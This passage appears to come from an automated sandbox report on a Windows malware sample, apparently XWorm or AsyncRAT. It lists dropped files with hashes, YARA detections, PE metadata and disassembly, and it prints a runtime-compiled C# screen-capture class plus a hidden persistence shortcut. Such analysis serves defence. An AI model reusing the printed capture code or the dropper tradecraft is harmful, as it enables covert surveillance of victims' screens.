                                                                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\_MEI58162\rar.exe
                                                                                                                                                                                                                              File Type:RAR archive data, v5
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):717502
                                                                                                                                                                                                                              Entropy (8bit):7.999741661799146
                                                                                                                                                                                                                              Encrypted:true
                                                                                                                                                                                                                              SSDEEP:12288:7MXjp+sVCqxuuYzLydn8nx/XBBv9Rpt1DNhbQa/k7hzfUt2heRs9B/aIzSUkRhLo:7MXj16+gx/XBBVRvhbN4xfVhJT/hSUOO
                                                                                                                                                                                                                              MD5:5ABC4CA26B445296C44E126928349297
                                                                                                                                                                                                                              SHA1:44116821C3CCC05CD14DB5CC8E029145CF1F52EB
                                                                                                                                                                                                                              SHA-256:BC2EAC657306DC416FF318F3F23F3A7C340B324944590F706792C3BCCAA914CB
                                                                                                                                                                                                                              SHA-512:12C4705FD46A3E970B63D3F11720D7DB31CB0C4E305A7F2C97A7855A33D3BA7FFEFA5E030FFFE31FA8A8535360E6B7F4C6D82F5093BD8485DBE749B96AF10B8C
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:Rar!....#n..!.....TII.o..2T..^h.%.^..,Y....../.s.4,.'....e.....{u..^...............8..w.lP...'#..P.[.. .82B..p..N".h.='.....t..S.>+.....I.5..7..iw.......'...cH.H..U...m.1...b...!...}.....#..C}.D.2o...x..6.....+......US.,....[.2.%.V.S.S..U*.Pe..~q...Is$\...E..q#H.:.t.:.uk.....y..].."...`.g"....f.....kAt.A....1%##mqz^.....W.].s.G|......E........s..q.Y..W...w..:....q.$.F\f....,.Y^..6"@....1=.e....'....m._...#.>........S..2..._.#.t).L..U...Y..j.M.2..@.e../;.g.i.i.P...u.nBo.....S<U..?..T.oX.$......5.qX...u_..B....z)/."..".p..N?r....... ./.hS.l=.'..f..$.N..4...zz..{d ..v4.Y......Q.5........<.H.....K..p.._...>...J..0..y..fg.G.QeQcOv.....Y.5W>..c.}3@.Y.wj,.D..w.T.K..I.....G.1:[v...?I..=.<.Szr\.|......<........2Rq` .... .....C..o...m..?.....Np. ...6UN.s..#..u.k...U......J.>P.^.^u".N...I.....`.....C<.-Z...f...H.wI.wK:{6.H{...B........1O..~{...l.....^.Z..r..{....Kc..ptk...o....\...2.H...j....QW.X.~)[Rnn.zg.-^..s.s....A.8....`ODA.....rqR..."..~ .=B..N<..V.O...
                                                                                                                                                                                                                              Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                                                                                                                              File Type:MSVC .res
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):652
                                                                                                                                                                                                                              Entropy (8bit):3.0876818418471483
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryqNTak7YnqqPN8PN5Dlq5J:+RI+ycuZhNsBakSPmPNnqX
                                                                                                                                                                                                                              MD5:43DC554C87B917B8CAD375941E5ACA5A
                                                                                                                                                                                                                              SHA1:F4E2AF0FC1684BD308CB9C70EB1B92D915D7C1D5
                                                                                                                                                                                                                              SHA-256:E2B7445A2127213776C5466509EB3A37341F7B46039502E43B29F0511837085E
                                                                                                                                                                                                                              SHA-512:37F30DDA64CC4DE37BF4314902F3D7A602E8508C5AED8D1FC8744AE161FD3E6B2BDFBB308350D5BB664C1F345CAAA830BDD5F7789A26BDD618764B53E09C51C6
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...t.u.y.1.n.s.p.n...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...t.u.y.1.n.s.p.n...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1004
                                                                                                                                                                                                                              Entropy (8bit):4.154581034278981
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:Jo4KMz04F03wykl4qk6oAuBGOUBrRmLW+7UCPa:Jo4hz0BAl4xBQ0XQCC
                                                                                                                                                                                                                              MD5:C76055A0388B713A1EABE16130684DC3
                                                                                                                                                                                                                              SHA1:EE11E84CF41D8A43340F7102E17660072906C402
                                                                                                                                                                                                                              SHA-256:8A3CD008E86A3D835F55F8415F5FD264C6DACDF0B7286E6854EA3F5A363390E7
                                                                                                                                                                                                                              SHA-512:22D2804491D90B03BB4B640CB5E2A37D57766C6D82CAF993770DCF2CF97D0F07493C870761F3ECEA15531BD434B780E13AE065A1606681B32A77DBF6906FB4E2
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:.using System;..using System.Collections.Generic;..using System.Drawing;..using System.Windows.Forms;....public class Screenshot..{.. public static List<Bitmap> CaptureScreens().. {.. var results = new List<Bitmap>();.. var allScreens = Screen.AllScreens;.... foreach (Screen screen in allScreens).. {.. try.. {.. Rectangle bounds = screen.Bounds;.. using (Bitmap bitmap = new Bitmap(bounds.Width, bounds.Height)).. {.. using (Graphics graphics = Graphics.FromImage(bitmap)).. {.. graphics.CopyFromScreen(new Point(bounds.Left, bounds.Top), Point.Empty, bounds.Size);.. }.... results.Add((Bitmap)bitmap.Clone());.. }.. }.. catch (Exception).. {.. // Handle any exceptions here.. }.. }.... return results;..
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (604), with no line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):607
                                                                                                                                                                                                                              Entropy (8bit):5.303863703742331
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:12:p37Lvkmb6KOkqe1xBkrk+ikOfN+WZEifV:V3ka6KOkqeFkOfN/EifV
                                                                                                                                                                                                                              MD5:AE16A1D1EDAB5E5A76A3628AD5C7BCBE
                                                                                                                                                                                                                              SHA1:CAF28D4D90E4D47372F726800D6480B647DCE0A2
                                                                                                                                                                                                                              SHA-256:0CFC93C5DBF7D8AC5D9196690D169604DDF38564E74C7B5ED9F96D6FF4B8CFEA
                                                                                                                                                                                                                              SHA-512:BB79C607879A38EBEDE56417C2327587F033CEF06FCC1A32C0EDC7DB3E3DD7FE40BC8D4999E6D5942A8267FB0A758044C86D0FF0F89B145397391E2F397750EE
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll" /out:"C:\Users\user\AppData\Local\Temp\tuy1nspn\tuy1nspn.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\tuy1nspn\tuy1nspn.0.cs"
                                                                                                                                                                                                                              Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):4096
                                                                                                                                                                                                                              Entropy (8bit):3.151938944327583
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:6C7oEAtf0KhzBU/Kf6mtJBN0ZpW1ulWa3Cq:uNz0Fm5OZ4K
                                                                                                                                                                                                                              MD5:F478C757836088178186F6D279E83D56
                                                                                                                                                                                                                              SHA1:E0BBA45F3DDB6EEC4C3D9DAFE9118D6CD24B59F3
                                                                                                                                                                                                                              SHA-256:3E1B0A414B5082EEEE1AA9DE4E5FFB143EC4AA2C3D3710F9FE03172A031BB7AA
                                                                                                                                                                                                                              SHA-512:E8DD3AE6A2C476F6E8D5ACB06504DED067D367B18F2FEF7852777627A0DDAA1684E56B4363F21BF5EAA6DA7FEBB3B2CD4C5A5FD8CF441EDC0F3EDC71A8CF67A7
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......g...........!.................&... ...@....... ....................................@..................................%..K....@.......................`....................................................... ............... ..H............text...$.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................&......H.......<!...............................................................0..........s.....(...........8...........o.......(......(....s........(..........(......(....s....~......(....o........,...o........o....t....o........,...o.......&.....X.......i?k....*...(....B.(j........9.Q...........{.........(....*BSJB............v4.0.30319......l.......#~..........#Strings............#US.........#GUID...........#Blob...........G.........%3............................................
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (708), with CRLF, CR line terminators
                                                                                                                                                                                                                              Category:modified
                                                                                                                                                                                                                              Size (bytes):1149
                                                                                                                                                                                                                              Entropy (8bit):5.480355623006581
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:KJfxkId3ka6KOkqeFkOfN/EifwKax5DqBVKVrdFAMBJTH:uekka6NkqeFkypEuwK2DcVKdBJj
                                                                                                                                                                                                                              MD5:45062897ED75824E3A2F07CAA26213D4
                                                                                                                                                                                                                              SHA1:8F5A9F639A90C3A0F632A9C02142731822B5ABE7
                                                                                                                                                                                                                              SHA-256:05C5B6F2A1F0335A62988CEBE3ACDD7875BB9179C18767CA441764E782F59DBB
                                                                                                                                                                                                                              SHA-512:88B74924E6659128F5D73C63674573F87C8F0424220B5F05EA3183AB4696ACD9D778B25F8A2153BCB7A3BC726C6367C201228C2C85AF5ECD71C037D7A189EAB6
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:.C:\Users\user\AppData\Local\Temp\..........> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll" /out:"C:\Users\user\AppData\Local\Temp\tuy1nspn\tuy1nspn.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\tuy1nspn\tuy1nspn.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longe
                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\bound.exe
                                                                                                                                                                                                                              File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Sun Oct 13 16:01:16 2024, mtime=Sun Oct 13 16:01:16 2024, atime=Sun Oct 13 16:01:16 2024, length=68096, window=hide
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):747
                                                                                                                                                                                                                              Entropy (8bit):5.087419652022599
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:12:86B+VVWO44e8WCudY//qoIpLkJ8ftsqjAg/rHzYcgTyIBmV:8rVVw4eHp+CoIldf6WA2XsjBm
                                                                                                                                                                                                                              MD5:48FF92A74EA8422BDCBE661CC927FD8A
                                                                                                                                                                                                                              SHA1:410AF8ADA0CC84CE9EABFB3C7D2BDF62A6FEB463
                                                                                                                                                                                                                              SHA-256:E2E53CD1CFE4C65CD4027635955845588DD44157346BE75FA25E4D0D511CADF5
                                                                                                                                                                                                                              SHA-512:27C8CFDCAD1761F8AEB1E804CB191CA538C667A591627329D02568C0521680C67656728C148663FE7283CC6C281BB2E465CB3C0300C7978CF8C1C7CC4B2216C4
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:L..................F.... ...................................................n.:..DG..Yr?.D..U..k0.&...&......vk.v......{....Sa..........t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^MY#............................%..A.p.p.D.a.t.a...B.V.1.....MY!...Roaming.@......CW.^MY!...........................h...R.o.a.m.i.n.g.....Z.2.....MY). .word.exe..B......MY).MY).....P.....................=...w.o.r.d...e.x.e.......V...............-.......U...........y.ud.....C:\Users\user\AppData\Roaming\word.exe........\.....\.....\.....\.....\.w.o.r.d...e.x.e.`.......X.......172892...........hT..CrF.f4... ..T..b...,.......hT..CrF.f4... ..T..b...,......E.......9...1SPS..mD..pH.H@..=x.....h....H.....K...YM...?................
                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\bound.exe
                                                                                                                                                                                                                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):68096
                                                                                                                                                                                                                              Entropy (8bit):5.88687623199494
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:1536:1KphzOhRIv2Sxe9gt+buEyTl/zcYhHTbvyOWgl26ht:1KvihRJSxr+b/yTF9hHTWOWud/
                                                                                                                                                                                                                              MD5:8D8BC4B4831CCCE11284D512630749C5
                                                                                                                                                                                                                              SHA1:ECBCB77BCF18FC3D13F462E73A92D7EC8FC1A364
                                                                                                                                                                                                                              SHA-256:DB45A6C0D488BB290D7C9DF70C282661A3AAA3929EA633CECC90165875EB27BB
                                                                                                                                                                                                                              SHA-512:3BD3524B53A30ABA83A6BA42310846C5E73EA0CE386C7EFF71BBEE423A79720208019D6D9D478B37DD32C710D75D746C65313A354B59A0AAE432F593959D7CAE
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Yara Hits:
                                                                                                                                                                                                                              • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\Users\user\AppData\Roaming\word.exe, Author: Joe Security
                                                                                                                                                                                                                              • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Roaming\word.exe, Author: Joe Security
                                                                                                                                                                                                                              • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Users\user\AppData\Roaming\word.exe, Author: ditekSHen
                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 84%
                                                                                                                                                                                                                              • Antivirus: Virustotal, Detection: 80%, Browse
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....D.f................................. ... ....@.. .......................`............@.....................................S.... .......................@....................................................... ............... ..H............text...$.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B........................H........_..........&.....................................................(....*.r...p*. ...*..(....*.r...p*. m.`.*.s.........s.........s.........s.........*.r...p*. .8..*.r...p*. ....*.r...p*. *p{.*.r...p*. ..?.*.r...p*. S...*..((...*.r...p*. .l..*.r...p*. ..e.*"(....+.*&(....&+.*.+5s^... .... .'..o_...(,...~....-.(G...(9...~....o`...&.-.*.rt..p*. E/..*.r...p*. K.w.*.rl..p*. ....*.r...p*. .J..*.rd..p*. .(T.*.r...p*..............j..................sa..............*"(I...+.*:
                                                                                                                                                                                                                              Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):55
                                                                                                                                                                                                                              Entropy (8bit):4.306461250274409
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                                                                                                                                                                                                              MD5:DCA83F08D448911A14C22EBCACC5AD57
                                                                                                                                                                                                                              SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                                                                                                                                                                                                              SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                                                                                                                                                                                                              SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}
                                                                                                                                                                                                                              Process:C:\Program Files\Windows Defender\MpCmdRun.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):97
                                                                                                                                                                                                                              Entropy (8bit):4.331807756485642
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:lyAZFXZDLsFzAXmZrCZDL4QXAVJK4v:lyqBtoJAXmoZDL4CA1v
                                                                                                                                                                                                                              MD5:195D02DA13D597A52F848A9B28D871F6
                                                                                                                                                                                                                              SHA1:D048766A802C61655B9689E953103236EACCB1C7
                                                                                                                                                                                                                              SHA-256:ADE5C28A2B27B13EFB1145173481C1923CAF78648E49205E7F412A2BEFC7716A
                                                                                                                                                                                                                              SHA-512:1B9EDA54315B0F8DB8E43EC6E78996464A90E84DE721611647E8395DBE259C282F06FB6384B08933F8F0B452B42E23EE5A7439974ACC5F53DAD64B08D39F4146
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:..Service Version: 0.0.0.0..Engine Version: 0.0.0.0....No engine/signature is currently loaded...
                                                                                                                                                                                                                              File type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                              Entropy (8bit):7.9933744864748455
                                                                                                                                                                                                                              TrID:
                                                                                                                                                                                                                              • Win64 Executable GUI (202006/5) 92.65%
                                                                                                                                                                                                                              • Win64 Executable (generic) (12005/4) 5.51%
                                                                                                                                                                                                                              • Generic Win/DOS Executable (2004/3) 0.92%
                                                                                                                                                                                                                              • DOS Executable Generic (2002/1) 0.92%
                                                                                                                                                                                                                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                                                              File name:sB2ClgrGng.exe
                                                                                                                                                                                                                              File size:7'962'066 bytes
                                                                                                                                                                                                                              MD5:4667ad84b811400babc982785614bb5f
                                                                                                                                                                                                                              SHA1:0016a4d0e998382722895dee4a062c0c318e37bf
                                                                                                                                                                                                                              SHA256:d69647cf1c96e058e4a9ed4887cc08a36c863751e711f98171e32cdc36478eda
                                                                                                                                                                                                                              SHA512:f3276d245eae7a52233e785c9a79cc9de034b89fec7ccf22ba796c2cc8789541e5cfeb0299e8b430b6bfab43a6ecb1c0fc94ac64022320e413925649c454d2cf
                                                                                                                                                                                                                              SSDEEP:196608:MvhBhOurErvI9pWjg/Qc+4o673pNrabeYyzWG+MYnN9sp:K4urEUWjZZ4dDLIeLzWG+TNCp
                                                                                                                                                                                                                              TLSH:3E86339573988DE5FD6A027CC3A59427D763BC276760E1CB03E406BA0F23AC15A3EB15
                                                                                                                                                                                                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........Zpc.Zpc.Zpc...`.]pc...f..pc...g.Ppc.....Ypc...`.Spc...g.Kpc...f.rpc...b.Qpc.Zpb..pc.O.g.Cpc.O.a.[pc.RichZpc.........PE..d..
                                                                                                                                                                                                                              Icon Hash:90cececece8e8eb0
                                                                                                                                                                                                                              Entrypoint:0x14000cdb0
                                                                                                                                                                                                                              Entrypoint Section:.text
                                                                                                                                                                                                                              Digitally signed:true
                                                                                                                                                                                                                              Imagebase:0x140000000
                                                                                                                                                                                                                              Subsystem:windows gui
                                                                                                                                                                                                                              Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                                                                                                                                                                                              DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                                                                                                                                                                                                                              Time Stamp:0x66CE4850 [Tue Aug 27 21:42:40 2024 UTC]
                                                                                                                                                                                                                              TLS Callbacks:
                                                                                                                                                                                                                              CLR (.Net) Version:
                                                                                                                                                                                                                              OS Version Major:6
                                                                                                                                                                                                                              OS Version Minor:0
                                                                                                                                                                                                                              File Version Major:6
                                                                                                                                                                                                                              File Version Minor:0
                                                                                                                                                                                                                              Subsystem Version Major:6
                                                                                                                                                                                                                              Subsystem Version Minor:0
                                                                                                                                                                                                                              Import Hash:72c4e339b7af8ab1ed2eb3821c98713a
                                                                                                                                                                                                                              Signature Valid:false
                                                                                                                                                                                                                              Signature Issuer:CN=Sectigo Public Code Signing CA EV R36, O=Sectigo Limited, C=GB
                                                                                                                                                                                                                              Signature Validation Error:The digital signature of the object did not verify
                                                                                                                                                                                                                              Error Number:-2146869232
                                                                                                                                                                                                                              Not Before, Not After
                                                                                                                                                                                                                              • 29/09/2021 01:00:00 29/09/2024 00:59:59
                                                                                                                                                                                                                              Subject Chain
                                                                                                                                                                                                                              • CN=Akeo Consulting, O=Akeo Consulting, S=Donegal, C=IE, OID.2.5.4.15=Private Organization, OID.1.3.6.1.4.1.311.60.2.1.3=IE, SERIALNUMBER=407950
                                                                                                                                                                                                                              Version:3
                                                                                                                                                                                                                              Thumbprint MD5:5C82B2D08EFE6EE0794B52D4309C5F37
                                                                                                                                                                                                                              Thumbprint SHA-1:3DBC3A2A0E9CE8803B422CFDBC60ACD33164965D
                                                                                                                                                                                                                              Thumbprint SHA-256:60E992275CC7503A3EBA5D391DB8AEAAAB001402D49AEA3F7F5DA3706DF97327
                                                                                                                                                                                                                              Serial:00BFB15001BBF592D4962A7797EA736FA3
                                                                                                                                                                                                                              Instruction
                                                                                                                                                                                                                              dec eax
                                                                                                                                                                                                                              sub esp, 28h
                                                                                                                                                                                                                              call 00007F33F4BFC36Ch
                                                                                                                                                                                                                              dec eax
                                                                                                                                                                                                                              add esp, 28h
                                                                                                                                                                                                                              jmp 00007F33F4BFBF8Fh
                                                                                                                                                                                                                              int3
                                                                                                                                                                                                                              int3
                                                                                                                                                                                                                              int3
                                                                                                                                                                                                                              int3
                                                                                                                                                                                                                              int3
                                                                                                                                                                                                                              int3
                                                                                                                                                                                                                              int3
                                                                                                                                                                                                                              int3
                                                                                                                                                                                                                              int3
                                                                                                                                                                                                                              int3
                                                                                                                                                                                                                              int3
                                                                                                                                                                                                                              int3
                                                                                                                                                                                                                              int3
                                                                                                                                                                                                                              int3
                                                                                                                                                                                                                              dec eax
                                                                                                                                                                                                                              sub esp, 28h
                                                                                                                                                                                                                              call 00007F33F4BFC738h
                                                                                                                                                                                                                              test eax, eax
                                                                                                                                                                                                                              je 00007F33F4BFC133h
                                                                                                                                                                                                                              dec eax
                                                                                                                                                                                                                              mov eax, dword ptr [00000030h]
                                                                                                                                                                                                                              dec eax
                                                                                                                                                                                                                              mov ecx, dword ptr [eax+08h]
                                                                                                                                                                                                                              jmp 00007F33F4BFC117h
                                                                                                                                                                                                                              dec eax
                                                                                                                                                                                                                              cmp ecx, eax
                                                                                                                                                                                                                              je 00007F33F4BFC126h
                                                                                                                                                                                                                              xor eax, eax
                                                                                                                                                                                                                              dec eax
                                                                                                                                                                                                                              cmpxchg dword ptr [0003577Ch], ecx
                                                                                                                                                                                                                              jne 00007F33F4BFC100h
                                                                                                                                                                                                                              xor al, al
                                                                                                                                                                                                                              dec eax
                                                                                                                                                                                                                              add esp, 28h
                                                                                                                                                                                                                              ret
                                                                                                                                                                                                                              mov al, 01h
                                                                                                                                                                                                                              jmp 00007F33F4BFC109h
                                                                                                                                                                                                                              int3
                                                                                                                                                                                                                              int3
                                                                                                                                                                                                                              int3
                                                                                                                                                                                                                              dec eax
                                                                                                                                                                                                                              sub esp, 28h
                                                                                                                                                                                                                              test ecx, ecx
                                                                                                                                                                                                                              jne 00007F33F4BFC119h
                                                                                                                                                                                                                              mov byte ptr [00035765h], 00000001h
                                                                                                                                                                                                                              call 00007F33F4BFB865h
                                                                                                                                                                                                                              call 00007F33F4BFCB50h
                                                                                                                                                                                                                              test al, al
                                                                                                                                                                                                                              jne 00007F33F4BFC116h
                                                                                                                                                                                                                              xor al, al
                                                                                                                                                                                                                              jmp 00007F33F4BFC126h
                                                                                                                                                                                                                              call 00007F33F4C0966Fh
                                                                                                                                                                                                                              test al, al
                                                                                                                                                                                                                              jne 00007F33F4BFC11Bh
                                                                                                                                                                                                                              xor ecx, ecx
                                                                                                                                                                                                                              call 00007F33F4BFCB60h
                                                                                                                                                                                                                              jmp 00007F33F4BFC0FCh
                                                                                                                                                                                                                              mov al, 01h
                                                                                                                                                                                                                              dec eax
                                                                                                                                                                                                                              add esp, 28h
                                                                                                                                                                                                                              ret
                                                                                                                                                                                                                              int3
                                                                                                                                                                                                                              int3
                                                                                                                                                                                                                              inc eax
                                                                                                                                                                                                                              push ebx
                                                                                                                                                                                                                              dec eax
                                                                                                                                                                                                                              sub esp, 20h
                                                                                                                                                                                                                              cmp byte ptr [0003572Ch], 00000000h
                                                                                                                                                                                                                              mov ebx, ecx
                                                                                                                                                                                                                              jne 00007F33F4BFC179h
                                                                                                                                                                                                                              cmp ecx, 01h
                                                                                                                                                                                                                              jnbe 00007F33F4BFC17Ch
                                                                                                                                                                                                                              call 00007F33F4BFC6AEh
                                                                                                                                                                                                                              test eax, eax
                                                                                                                                                                                                                              je 00007F33F4BFC13Ah
                                                                                                                                                                                                                              test ebx, ebx
                                                                                                                                                                                                                              jne 00007F33F4BFC136h
                                                                                                                                                                                                                              dec eax
                                                                                                                                                                                                                              lea ecx, dword ptr [00035716h]
                                                                                                                                                                                                                              call 00007F33F4C09462h
                                                                                                                                                                                                                              NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_IMPORT0x3ca5c0x78.rdata
                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_RESOURCE0x470000x94c.rsrc
                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x440000x2250.pdata
                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_SECURITY0x79598a0x2448
                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_BASERELOC0x480000x764.reloc
                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_DEBUG0x3a0800x1c.rdata
                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x39f400x140.rdata
                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_IAT0x2b0000x4a0.rdata
